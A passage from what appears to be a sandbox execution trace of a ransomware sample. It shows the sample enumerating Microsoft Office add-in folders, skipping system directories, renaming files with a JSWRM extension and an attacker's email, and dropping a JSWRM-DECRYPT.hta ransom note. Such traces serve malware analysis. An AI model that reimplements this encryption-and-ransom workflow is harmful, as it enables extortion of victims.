lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0124.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0124.210] CloseHandle (hObject=0x338) returned 1 [0124.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0124.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0124.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0124.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0124.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0124.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0124.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0124.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0124.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0124.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0124.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.210] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hi\\PowerViewRes.hi.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\hi\\powerviewres.hi.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hi\\PowerViewRes.hi.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\hi\\powerviewres.hi.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0124.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0124.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0124.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0124.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0124.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0124.212] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1428e945, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1428e945, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x142b4b24, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x51e14, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.hi.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0124.212] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0124.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0124.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0124.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0124.213] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7beb2bc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13b67741, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13b67741, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="hr", cAlternateFileName="")) returned 1 [0124.213] lstrcmpiW (lpString1="hr", lpString2=".") returned 1 [0124.213] lstrcmpiW (lpString1="hr", lpString2="..") returned 1 [0124.213] lstrcmpiW (lpString1="hr", lpString2="...") returned 1 [0124.213] lstrcmpiW (lpString1="hr", lpString2="windows") returned -1 [0124.213] lstrcmpiW (lpString1="hr", lpString2="recovery") returned -1 [0124.213] lstrcmpiW (lpString1="hr", lpString2="perflogs") returned -1 [0124.213] lstrcmpiW (lpString1="hr", lpString2="documents and settings") returned 1 [0124.213] lstrcmpiW (lpString1="hr", lpString2="$RECYCLE.BIN") returned 1 [0124.213] lstrcmpiW (lpString1="hr", lpString2="system volume information") returned -1 [0124.213] lstrcmpiW (lpString1="hr", lpString2="msocache") returned -1 [0124.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0124.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0124.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0124.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0124.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0124.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0124.213] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\hr\\jswrm-decrypt.hta")) returned 0xffffffff [0124.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0124.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0124.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0124.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0124.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0124.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0124.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0124.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0124.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0124.215] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\hr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0124.216] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.216] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0124.218] CloseHandle (hObject=0x314) returned 1 [0124.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0124.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0124.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0124.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0124.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0124.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0124.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0124.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0124.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0124.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\hr\\jswrm-decrypt.hta")) returned 0x20 [0124.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0124.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0124.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0124.218] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hr\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7beb2bc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13b67741, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40b212a8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232080 [0124.218] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0124.218] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7beb2bc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13b67741, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40b212a8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0124.218] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0124.218] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0124.218] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7beb2bc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7beb2bc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x14268686, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc40d8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0124.218] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0124.219] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0124.219] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0124.219] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0124.219] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0124.219] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0124.219] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0124.219] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.219] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0124.219] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0124.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0124.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0124.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0124.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0124.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0124.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241038, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0124.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0124.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0124.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0124.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0124.219] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40b212a8, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x40b212a8, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x40b47536, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0124.219] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0124.219] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0124.219] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0124.219] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0124.219] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0124.219] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0124.219] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0124.219] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0124.219] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0124.219] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0124.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0124.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0124.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0124.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0124.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0124.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0124.220] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfaf07af2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfaf07af2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfaf2dd35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x12088, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0124.220] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0124.220] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0124.220] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0124.220] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0124.220] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0124.220] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0124.220] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0124.220] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.220] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0124.220] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0124.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0124.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0124.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0124.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0124.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d298, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0124.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0124.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0124.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0124.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.221] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7beb2bc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7beb2bc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7beb2bc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0124.221] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0124.221] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0124.221] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0124.221] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0124.221] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0124.221] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0124.221] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0124.221] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.221] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0124.221] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0124.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0124.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0124.221] RtlAllocateHeap 